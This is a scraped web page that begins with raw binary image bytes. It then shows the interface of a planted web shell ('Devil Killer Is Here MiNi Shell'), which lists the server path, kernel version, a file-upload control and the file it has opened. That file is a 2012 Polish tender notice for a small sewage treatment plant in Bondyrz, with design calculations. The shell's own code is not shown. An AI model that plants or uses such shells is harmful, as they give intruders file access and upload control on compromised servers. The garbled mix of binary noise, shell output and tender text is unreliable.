JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120405/108456-N-2012.html

<p class="kh_header"><b>Adamów: Budowa oczyszczalni ścieków w m. Bondyrz</b><br>
<b>Numer ogłoszenia: 108456 - 2012; data zamieszczenia: 05.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Adamów , Adamów 11b, 22-442 Adamów, woj. lubelskie, tel. +48-084-6186102, faks +48-084-6187715.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa oczyszczalni ścieków w m. Bondyrz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1 Określenie przedmiotu zamówienia
Przedmiotem jest oczyszczalnia ścieków o przepustowości Qśr.dob.= 12,5 m3/d,
obsługująca 100 RLM wraz z odprowadzeniem ścieków oczyszczonych do rowu melioracyjnego. Opracowanie jest skierowane dla uporządkowania i modernizacji gospodarki wodno - ściekowej dla istniejących budynków mieszkalnych poprzez budowę osiedlowej oczyszczalni, której praca oparta będzie na technologii osadu czynnego, niskoobciążonego.
Inwestycja polegać będzie na wykonaniu nitki technologicznej oczyszczającej ścieki surowe,w skład której wchodzić będą :
- kanał dopływu DN 200 PCV;
- pompownia ścieków surowych;
- zbiorniki oczyszczalni O2800;
- kanał zrzutowy DN160 PCV;
- wylot brzegowy do rowu melioracyjnego;
2.2 Lokalizacja inwestycji.
Teren inwestycji położony jest w m. Bondyrz, gm. Adamów, pow. zamojski.
Kanał dopływu do oczyszczalni zlokalizowany będzie na dz. 2089/12. Oczyszczalnia wraz z pompownią posadowiona zostanie na dz. Nr ewid. 2089/15. Kanał zrzutowy ścieków czyszczonych przebiegał będzie przez działkę nr ewid. 2089/12, drogę gminna dz. nr ewid. 1581 oraz 1579/1 gdzie zlokalizowany zostanie wylot do odbiornika - rowu melioracyjnego.
2.2.1 Istniejący i projektowany stan zagospodarowania terenu
Na terenie działki nr ew. 2089/12 zlokalizowany jest obecnie budynek mieszkalny. Teren działki nr ew. 2089/15, na której zlokalizowana będzie oczyszczalnia jest niezabudowany.
Teren lokalizacji inwestycji uzbrojony jest w:
- sieć gazowa
- sieć wodociągową
- kanalizację sanitarną
- siec energetyczną
Obiekty oczyszczalni ścieków będą zlokalizowane w odległości ok. 30 m od istniejącej zabudowy mieszkalnej, oraz 12 m od osi istniejącej drogi gminnej.
Przewidziany w projekcie zakres robót:
1. Zabudowa studni na trasie istniejącego kanału DN200 odprowadzającego ścieki z
    budynków i budowa kanału dopływowego.
2. Budowa pompowni ścieków, posadowienie zbiorników oczyszczalni SC100.
3. Wykonanie kanału zrzutowego ścieki oczyszczone do rowu melioracyjnego.
4. Wykonanie zasilania zalicznikowego pompowni i oczyszczalni.
Szczegółowe usytuowanie wzajemne obiektów pokazano w części graficznej dokumentacji projektowo wykonawczej.
2.3. Cechy techniczne i jakościowe przedmiotu zamówienia z zachowaniem Polskich Norm przenoszących normy europejskie lub normy innych państw członkowskich Europejskiego Obszaru gospodarczego przenoszących te normy, szczególne wymagania techniczne i jakościowe odnoszące się do przedmiotu zamówienia:
2.3.1 Normy
PN-EN 12255-6:2005
Oczyszczalnie ścieków 
PN-EN 13476-1:2008
Systemy przewodów rurowych z tworzyw sztucznych do podziemnego bezciśnieniowego
odwadniania i kanalizacji - Systemy przewodów rurowych o ściankach strukturalnych znieplastyfikowanego poli(chlorku winylu) (PVC-U), polipropylenu (PP) i polietylenu (PE) -
Część 1: Wymagania ogólne i właściwości użytkowe
PN-C-89221:1998/Az1:2004
Rury z tworzyw sztucznych - Rury drenarskie karbowane z niezmiękczonego poli(chlorkuwinylu) (PVC-U)
PN-EN 13252:2002/A1:2006
Geotekstylia i wyroby pokrewne - Właściwości wymagane w odniesieniu do wyrobów
stosowanych w systemach drenażowych
PN-EN 12050-1:2002
Przepompownie ścieków w budynkach i ich otoczeniu - Zasady budowy i badania - Część
1: Przepompownie ścieków zawierających fekalia.
PN-EN 1610:2002
Budowa i badania przewodów kanalizacyjnych.
PN-HD 603 S1:2006/Ap1/2007
Kable elektroenergetyczne na napięcie znamionowe 0,6/1 kV.
PN-B-02480/1986
Grunty budowlane - określenia, symbole, podział i opis gruntu.
PN-EN 1329-1:2001
Systemy przewodowe z tworzyw sztucznych do odprowadzania nieczystości i ścieków (o niskiej i wysokiej temperaturze) wewnątrz konstrukcji budowli - niezmięczony poli(chlorek winylu) (PVC-U) - Część I: Wymagania dotyczące rur, kształtek i systemów.
PN-EN 809:1999/AC:2004
Pompy i zespoły pompowe do cieczy- Ogólne wymagania bezpieczeństwa.
PN-M-44015:1997
Pompy - ogólne wymagania i badania.
2.4.Pprojekt architektoniczno - budowlany (branża technologiczno - instalacyjna i budowlana
2.4.1 Bilans masowy (ilość i skład ścieków).
2.4.1.1 Źródła ścieków
Przedmiotowe ścieki można sklasyfikować następująco:
- Ścieki gospodarcze: z urządzeń sanitarno-higienicznych (kuchnia, łazienka)
- Ścieki fekalne: z WC
Ścieki poddane zostaną oczyszczeniu w oczyszczalni typu SC100, która pracuje w oparciu o metodę (niskoobciążonego osadu czynnego).
W skład oczyszczalni wchodzą:
- Pompownia ścieków
- Osadnik wstępny
- Komora napowietrzania zintegrowana z osadnikiem wtórnym
2.4.1.2 Bilans ścieków
Bilans ścieków dokonano na podstawie ilości użytkowników oraz wyposażenia
sanitarnego budynku.
Ilość przewidywanych mieszkańców - 100 osób.
Zużycie wody na podstawie Dziennika Urzędowego MGPiB z 1996 r. - 125 l/M*d.
Współczynnik nierównomierności spływu przyjęto następująco:
- współczynnik nierównomierności spływu maksymalny dobowy (Nd) - 1,3,
- współczynnik nierównomierności spływu maksymalny godzinowy (Nh) - 2,0.
Ilość ścieków wyniesie:
- spływ średni:
Qśrd=125 l/M*d * 100
Qśrd=12,5 m3/d
- spływ maksymalny dobowy:
Qmax d = 12,5 l/M*d * 1,3
Qmax d = 16,25 m3/d
- spływ maksymalny godzinowy:
Qmax. H = 12,5 m3/d / 24 h*1,3*2,0
Qmax. H= 1,35 m3/h
2.4.1.3 Jakość ścieków bytowych surowych
W celu określenia jakości ścieków surowych posłużono się wskaźnikiem  jednostkowych zanieczyszczeń (na mieszkańca) w ściekach bytowo-gospodarczych jednostek osadniczych:
- BZT5 = 60 g/M*d,
- zawiesina ogólna = 65 g/M*d.
Liczba równoważnych mieszkańców: RLM = 100 osób.
Maksymalne ładunki zanieczyszczeń w ściekach wyniosą:
- BZT5 = 60 g/M*d * 100 = 6000 g O2/d,
- Zawiesina ogólna = 65 g/M*d * 1000 = 6500 g/d.
Stężenia zanieczyszczeń odpowiednio wynoszą:
- BZT5 = 6000/ 12,5 = 480 g O2/m3,
- Zawiesina ogólna = 6500/ 12,5 = 520 g/m3.
2.5 Sposób oczyszczania ścieków
Oczyszczaniu zostaną poddane tylko ścieki sanitarne. Przewiduje się zastosowanie oczyszczalni typu SC100 z osadnikiem wstępnym- kartę katalogową oczyszczalni załączono w formie oddzielnego załącznika do opracowania. Oczyszczalnia ta zapewni pełne biologiczne oczyszczenie ścieków z nitryfikacją i denitryfikacją oraz biologiczną defosfatacją włącznie. Oczyszczalnie typu SC100 posiadają  Certyfikat zgodności z europejską normą nr EN 12566-3, dzięki czemu może być stosowana na terenie całej UE.  Całość ścieków powstałych w budynkach odprowadzana będzie kanałem PVCO160 na ciąg oczyszczania. Zestaw urządzeń do oczyszczania stanowić będą;
- Osadnik wstępny, Komora Napowietrzania, Osadnik wtórny. Wszystkie komoryzintegrowane w jednym kontenerze- Ows/ KN/ Owt.
Ścieki dopływające do oczyszczalni zostaną wstępnie oczyszczone w osadniku wstępnym- Ows. Zadaniem osadnika będzie nie tylko mechaniczne podczyszczenie ścieków, ale również umożliwienie przeprowadzenia procesów denitryfikacji i magazynowanie gromadzących się tam osadów ściekowych. 
Następnie wstępnie oczyszczone ścieki dopłyną poprzez otwory denne do komory napowietrzania- bioreaktora KN, gdzie razem z aktywną biologicznie zawiesiną osadu czynnego poddawane będą napowietrzaniu drobno pęcherzykowemu poprzez dyfuzor i umieszczoną na zewnątrz zbiornika dmuchawę membranową. Kolonie mikroorganizmów osadu czynnego wykorzystując tlen z wtłoczonego do bioreaktora powietrza rozkładać będą związki organiczne zawarte w ściekach.
Ze względu na wydajność systemu napowietrzania, większą od wymaganej dla zapewnienia rozkładu związków organicznych, nitryfikacji i stabilizacji tlenowej osadu, dmuchawa włączana będzie cyklicznie za pomocą czasowego urządzenia sterującego. Dzięki zastosowaniu określonego podziału na komory funkcyjne cały system podzielony jest na określone części w których panują warunki: tlenowe oraz beztlenoweh. Zachodzące dzięki temu w komorze procesy denitryfikacji i wzmożonej defosfatacji biologicznej pozwolą na osiągnięcie wymaganego stopnia oczyszczenia ścieków ze związków biogennych. 
W miarę napływu ścieków do komory napowietrzania będzie następował ich równomierny dopływ do osadnika wtórnego Owt umieszczonego w jego wnętrzu. W projektowanej oczyszczalni zastosowano pełny osadnik wtórny w postaci leja o przepływie pionowym. Ścieki oczyszczone o jakości zgodnej z wymogami Rozporządzenia Ministra Środowiska  z dnia 24.07.2006, w sprawie warunków jakie należy spełnić przy wprowadzaniu ścieków do wód lub do ziemi oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego DZ.U. nr 137 poz. 984 z 2006r., odprowadzane będą z osadnika wtórnego przelewem umieszczonym na jego powierzchni do pobliskiej studni chłonnej. Przyrastający w komorze nadmierny osad czynny będzie z niej okresowo usuwany przy pomocy pompy recyrkulacji- podnośnika powietrznego do osadnika wstępnego, gdzie razem z wydzielonym tam osadem podlegać będzie beztlenowej fermentacji przez okres 0,5-1 roku. Po tym czasie będzie wywożony taborem asenizacyjnym na zbiorczą oczyszczalnię ścieków. Odprowadzenie oczyszczonych ścieków do odbiornika rowu melioracyjnego realizowane jest za pośrednictwem kolektora zrzutowego PVCO160.
2.6 Charakterystyka urządzeń oczyszczalni
W skład projektowanej oczyszczalni przydomowej wchodzić będą następujące moduły:
- Pompownia ścieków - komora pomp o średnicy wewn. D = 1200 mm wys. 
h = 5,76 m.
- KOMORY OCZYSZCZALNI- Ows/ KN/ Owt- o wymiarach
1. Średnica d= 2 x 2800 mm
2. Wysokość h= 1800 mm
3. Pojemność aktywna- 24,6 m3
Podzielona na następujące części
4. OSADNIK WSTĘPNY- Ows
5. KOMORA NAPOWIETRZANIA- KN
6. OSADNIK WTÓRNY- Owt:
2.7 Parametry techniczne i konstrukcja oczyszczalni ścieków
2.7.1 Pompownia ścieków.
Pompownia podnosząca ścieki do zbiornika oczyszczalni z zainstalowanymi dwoma pompami pracującymi naprzemiennie o parametrach : wydajność Q=7,2 m3/h, wysokość podnoszenia H=5,07 m, moc pompy 0,75kW. Zbiornik pompowni wykonany z kręgów betonowych łączonych na uszczelkę z płytą żelbetową i włazem 700X600. W komorze pomp  zainstalować drabinkę lub stopnie złazowe, oraz wywietrznik. Armatura pompowni objęta dostawą.
2.7.2 Osadnik wstępny
Osadnik wstępny umiejscowiony jest w zbiorniku oczyszczalni ze stali nierdzewnej o
średnicy O2800. Osadnik posadowiony jest pod powierzchnią, terenu z możliwością, dostępu poprzez studzienkę inspekcyjna z włazem żeliwnym. Wymagana pojemność części przepływowej osadnika przy czasie zatrzymania ścieków równym t = 4 h wynosi:
Vprz= (q*M*t)/ t= (125*100*4)/ 24
Vprz=2083 [dm3]
gdzie: q - jednostkowe zużycie wody, M - liczba mieszkańców
Ilość osadu mieszanego przefermentowanego powstającego na oczyszczalni będzie wynosić:
Zp= 55 [g s.m./Mxd] x 100 [M] = 5500 [g s.m./d] = 15068,5 [kg s.m./rok]
Uwodnienie tego osadu będzie wynosić ok. W=93 % w związku, z czym jego objętość wyniesie: 
Vzaw= Zp/ 10(100-W) = 5500/10(100-93)
Vzaw = 78,57 [dm3/d] = 28 678, 05 [ dm3/rok]
Wymagana pojemność części osadowej przy założeniu 2 miesięcznego okresu magazynowania osadu w związku z powyższym będzie wynosić 4779,65 [dm3]. Wymagana  pojemność całkowita wyniesie:
Zastosowano zbiornik o wymiarach:
- Średnica d= 2x 2800 mm
- Wysokość h= 1800 mm
- Pojemność aktywna- 24,6 m3
Osad o uwodnieniu 93 % z osadnika wstępnego po 6 miesiącach przetrzymywania
zostanie odpompowany i odwieziony taborem asenizacyjnym na zbiorcza oczyszczalnię ścieków.
n = t/ (a+b*t) , gdzie t= czas przetrzymania ścieków, a i b= współczynniki przyjmowane w odniesieniu do BZT-a=0,018 oraz b=0,02, a w odniesieniu do zawiesin ogólnych a= 0,0075 oraz 
b= 0,014, n BZT5= 11/ (0,018+0,02*11)= 46,22 %, n zaw= 11/ (0,0075+0,014*11)= 68,11 %
Ładunki zanieczyszczeń w ściekach odpływających z osadnika wstępnego będą
w związku z tym wynosić:
1. Ł BZT5= 6000*(100-46,22)/100= 3228 g BZT5 / d
2. Ł zaw= 6500*(100-68,11)/100= 2073 g s.m./d
2.7.3 Komora napowietrzania
Komora napowietrzania oczyszczalni ścieków wraz z osadnikiem wtórnym, systemem napowietrzania i systemem recyrkulacji osadów stanowi urządzenie do biologicznego oczyszczania ścieków typu SC. Komorę napowietrzania stanowić będzie zbiornik wykonany ze stali nierdzewnej o pojemności całkowitej 16 600 dm3. Pojemność czynna komory napowietrzania wynosić będzie Vk= 14 600 m3 w związku, z czym średni czas zatrzymania ścieków w komorze będzie wynosił:
- T= (Vk/ Qdśr)= 14,6/ 12,5
- T= 1,17 [d]= 29 [h]
Obciążenie osadu ładunkiem zanieczyszczeń będzie się zmieniało w czasie pracy
oczyszczalni w granicach:
- OSmax= (Ł BZT5)/ Vk*Xmin= 3,228/ 14,6*2
- OSmax = 0,1105 [g BZT5/g s.m. x d]
- OSmin= (Ł BZT5)/ Vk*Xmax= 3,228/ 14,6 *4
- OSmin = 0,055 [g BZT5/g s.m. x d] gdzie: 
Xmin- minimalne stężenie osadu w komorze 2 kg/m3
Xmax- maksymalne stężenie osadu w komorze 4 kg/m3
Średni przyrost osadu w komorze napowietrzania będzie wynosił:
X=(Y * Ł BZT5) - (Qdśr * Z)= 0,5 * 3228 - 12,5 * 30= 1239 [g s.m./d]
przy stężeniu zawiesiny w ściekach odpływających z oczyszczalni Z= 30 g/m3 i jednostkowym przyroście osadu Y=0,5 g s.m./ g BZT5.
Średnie zapotrzebowanie tlenu w układzie przy stosunku OC:L= 2,5 wyniesie:
- ZO2= OC: L x Ł BZT
- ZO2= 2,5 * 3228 = 8070 [g O2/d]
Średnie zapotrzebowanie powietrza przy założeniu stopnia wykorzystania tlenu n= 12g02/Nm3 * m będzie natomiast wynosiło:
- Zpow=ZO2/ (n*hd)= 8070/(12*1,60)
- Zpow= 420,31 [m3 O2/d]
gdzie hd - głębokość zanurzenia dyfuzora pod powierzchnią ścieków.
2.7.4 System napowietrzania
System napowietrzania oczyszczalni będzie stanowiła dmuchawa membranowa połączona przewodem sprężonego powietrza z dyfuzorem membranowym znajdującym się w komorze napowietrzania oczyszczalni. Głębokość zanurzenia dyfuzora pod powierzchnią ścieków będzie wynosiła hd = 1,60 m. Nadciśnienie robocze równe sumie strat ciśnienia na przewodach doprowadzających i dyfuzorze oraz ciśnieniu hydrostatycznemu słupa cieczy nad dyfuzorem wyniesie 200 mbar. Biorąc powyższe pod uwagę zastosowano membranowa dmuchawę typ 30DH firmy Effepizeta o wydajności Qdm= 100 m3/h przy nadciśnieniu hp=400 mbar. Wymagany minimalny czas pracy dmuchawy dla dostarczenia niezbędnej ilości tlenu do układu wyniesie:
- t=Zpow/ Qdm= 420,31/ 100
- t= 4,2 [h/d]
W ramach rozruchu oczyszczalni przewiduje się ewentualna korektę tych nastawień dla indywidualnych potrzeb w oparciu o wyniki pomiarów stężenia tlenu rozpuszczonego w komorze napowietrzania w czasie normalnej pracy oczyszczalni. Przewód sprężonego powietrza wykonany z PE O 63 o średnicy wewnętrznej 50 mm będzie ułożony ze spadkiem w kierunku oczyszczalni ścieków min. 1 % i połączony z dmuchawą i rura mocująca dyfuzor do zbiornika oczyszczalni przy pomocy złączek zaciskowych typu POLY RAC. Prędkość przepływu powietrza w przewodzie będzie wynosiła 4,24 m/s.
2.7.5 Układ recyrkulacji osadów
Powstający w stopniu biologicznym oczyszczalni osad nadmierny wymagać będzie okresowego usuwania do osadnika wstępnego poprzez wbudowany do oczyszczalni  system recyrkulacji osadu. Układ ten składa się: z przewodu sprężonego powietrza PE O 63 łączącego dmuchawę z podnośnikiem powietrznym, stanowiącym pompę recyrkulacji osadów, wyposażonym w zawór kulowy 2 cale oraz z przewodu recyrkulacji osadu PE O 50 łączącego komorę napowietrzania z pierwszą, komorą, osadnika wstępnego.
Usuwanie osadu z komory napowietrzania do osadnika wstępnego będzie się odbywało w trakcie procesu nadmuchiwania poprzez to, iż zawór ustawiony będzie tak aby ilość osady recyrkulowanego wychodziła 1/3 do 1/ 2 średnicy rurki. Objętość jednorazowo usuwanej porcji osadu będzie wynosić ok. 150 dm3 osadu o stężeniu ok. 4 kg s.m./m3.
2.7.6 Osadnik wtórny
Osadnik wtórny jest zbiornikiem półcylindrycznym posadowionym w komorze napowietrzania ze ścianami nachylonymi pod kątem 55 stopni oraz ze szczeliną do której przyłączony jest podnośnik mamutowy umożliwiający przepływ ścieków z dołu do góry oraz w przeciwprądzie recyrkulację osadów wytraconych w osadniku. Pojemność czynna osadnika wynosi Vsed= 3200 dm3. Na powierzchni osadnika umieszczono przelew pilasty ze stali nierdzewnej pozwalające na ujednorodnienie prędkości przepływu ścieków przez cała powierzchnię osadnika. Średni i minimalny czas zatrzymania ścieków w osadniku wtórnym będzie wynosił:
1. tśr = (Vsed*24)/ Qdśr= (3,2*24)/ 12,5 tśr=6,14 [h]
2. tmin=Vsed/ Qhmax=3,2/ 1,35 tmin= 2,37 [h]
Maksymalne obciążenie hydrauliczne powierzchni osadnika wtórnego będzie wynosić:
3. Oh= Qhmax/ Ssed= 1,35/ 4,62 Oh= 0,29 [m3/ m2*h]
Maksymalne obciążenie powierzchni osadnika wtórnego zawiesiny wyniesie natomiast:
4. OZ = Oz= (Xmax *Qhmax)/ Ssed= 4*1,35/ 4,62 Oz= 1,17 [g s.m./ m2*h]
2.7.7 Zasilanie energetyczne
Odbiornikiem energii elektrycznej na oczyszczalni będzie pompownia o mocy 0,75kW i dmuchawa membranowa o mocy 1,5kW pracujące okresowo i sterowana wyłącznikiem. Dmuchawę należy podłączyć poprzez sterownik czasowy do uziemionego gniazda elektrycznego (400 V; ~50 Hz). Dmuchawa oraz sterownik czasowy znajdować się będą w szafce zlokalizowanej na płycie pompowni. Obliczeniowa energochłonność oczyszczalni ścieków będzie wynosić:  E=(Pdm*t)/ Qdśr=(1,500*11,9)/12,5 E=1,43 [kWh/m3]= 17,86 [kWh/d]
2.8 Redukcje zanieczyszczeń.
Ładunki zanieczyszczeń w ściekach odpływających z osadnika wstępnego będą w związku z tym wynosić:
- Ł BZT5= 480*(100-46,22)/100= 258,14 g BZT5 / d
- Ł zaw= 520*(100-68,11)/100= 165,83 g s.m./d
Przewidywany procent redukcji po komorze napowietrzania wyniesie:
- 95% dla BZT5
- 95 % dla zawiesiny.
Zatem odpowiednie stężenia dla odprowadzanych ścieków wyniosą:
- SBZT5 = 258,14 (1 - 0,95) = 12,9 [g/m3]
- Szaw og = 165,83 (1 - 0,95) = 8,29 [g/m3]
Przewidywane stężenie azotu ogólnego SNog = 15 [g/m3]
Normy oraz sposób wykonania i odbioru robót określa specyfikacja techniczna wykonania i odbioru robót - dla branż występujących w niniejszym zadaniu inwestycyjnym. Na podstawie art. 30 ust.4 i 5 ustawy zamawiający dopuszcza rozwiązania równoważne opisywanym przy pomocy norm. Wykonawca, który zechce zastosować rozwiązania równoważne opisywanym przez zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez zamawiającego w dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót.
Zamawiający dla zastosowanych rozwiązań równoważnych, żąda opisu szczegółowego zastosowanych rozwiązań wraz ze stanowiskiem wykonawcy o spełnianiu danych zawartych w Specyfikacji Technicznej Wykonania i Odbioru Robót, z zastrzeżeniem powołania fakultatywnego nadzoru autorskiego w umowie o wykonawstwo oczyszczalni ścieków objętych niniejszym postępowaniem, tym samym zgodnie z zapisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane1) (Dz.U.2010.243.1623 j.t. z późn. zm.), zamawiający może zwrócić się o wydanie opinii w zakresie równoważności zastosowanych rozwiązań przez wykonawcę, przez co należy rozumieć zapisy Art. 57 upb. Stanowisko projektanta dla braku akceptacji dla zastosowania rozwiązań równoważnych (odstępstw) mogłoby spowodować realizacje prac niezgodnych z posiadanym projektem budowlanym oraz uzyskanego pozwolenia na budowę
2.9 Nazwy / kody określone dla przedmiotu zamówienia we Wspólnym Słowniku Zamówień
CPV 45252127-4 Roboty budowlane w zakresie oczyszczalni ścieków
CPV 45232410-9 Roboty budowlane w zakresie kanalizacji ściekowej
CPV 45315300-1 Instalacje zasilania elektrycznego
CPV 45340000-2 Wznoszenie ogrodzeń
2.10 W zakres prac generalnego wykonawcy, wchodzą oprócz ujętych w kosztorysie; 
- Pełna obsługa geodezyjna, przez co zamawiający rozumie prace geodezyjne pomiarowe w trakcie realizacji przedmiotu zamówienia. Obsługa geodezyjna powykonawcza obejmuje sporządzenie pomiarów powykonawczych i przedstawienie ich zamawiającemu w 3 egzemplarzach papierowych oraz 1 egzemplarzu na nośniku CD/DVD w postaci zapisanych plików w formacie *.pdf.
-Wykonanie rozruchu urządzenia oczyszczalni ścieków oraz przedstawienie zamawiającemu wyników laboratoryjnych badań ścieków oczyszczonych.
-Przeszkolenie pracownika zamawiającego w zakresie obsługi i konserwacji oczyszczalni ścieków.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.27-4, 45.23.24.10-9, 45.31.53.00-1, 45.34.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
